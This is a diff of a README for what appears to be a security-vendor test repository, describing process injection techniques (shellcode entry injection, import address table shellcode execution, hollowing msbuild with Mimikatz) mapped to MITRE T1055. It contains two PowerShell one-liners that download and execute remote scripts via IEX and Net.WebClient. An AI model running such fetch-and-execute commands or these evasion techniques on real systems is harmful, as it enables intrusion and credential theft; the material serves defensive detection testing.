smgorelik/VendorSimTestScripts/README.md

 https://attack.mitre.org/techniques/T1055/

-### 1. Shellcode Entry Injection
+### Shellcode Entry Injection
 Injection of shellcode into the entry of a legitimate spawn process In this example we will inject shellcode into notepad that spawns calculator

-** Unfortunately MITRE doesn't have a technique mapping to shellcode injection, nevertheless its own of the popular evasion techniques **
+** Unfortunately MITRE doesn't have a technique mapping to shellcode injection, nevertheless its one of the popular evasion techniques **

 `PS> IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/smgorelik/VendorSimTestScripts/main/Invoke-ShellcodeInjection1.ps1"); Invoke-Shellcode1;`

+### Shellcode Import Address Table Execution
+Iteration through process environment block while searching ntdll "openprocess" system call from within the import of kernelbase.dll (legitimate core dll)

+** Unfortunately MITRE doesn't have a technique mapping to shellcode execution, nevertheless its one of the popular evasion techniques **

+`PS> IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/smgorelik/VendorSimTestScripts/main/Invoke-IAT-Shellcode.ps1"); Invoke-IAT-Shellcode;`

-### 2. Hollowing
+### Hollowing
 Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses.
 Process hollowing is a "living-off-the-land" method of executing arbitrary code in the address space of a separate live process.
 In this example we will hollow legitimate windows msbuild 64 bit process with Mimikatz process